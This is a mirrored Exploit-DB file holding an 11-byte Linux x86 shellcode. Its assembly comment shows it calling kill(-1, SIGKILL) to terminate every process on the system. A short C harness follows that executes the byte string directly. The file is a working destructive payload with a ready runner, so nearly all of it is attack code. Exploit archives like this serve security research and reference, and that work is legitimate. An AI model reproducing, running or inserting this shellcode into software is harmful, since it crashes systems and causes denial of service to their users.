exploit-db-mirror/shellcodes/linux_x86/13345.c
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
469 B
C

/* By Kris Katterjohn 11/13/2006
*
* 11 byte shellcode to kill all processes for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; kill(-1, SIGKILL)
*
* push byte 37
* pop eax
* push byte -1
* pop ebx
* push byte 9
* pop ecx
* int 0x80
*/
main()
{
char shellcode[] = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80";
(*(void (*)()) shellcode)();
}
// milw0rm.com [2007-03-09]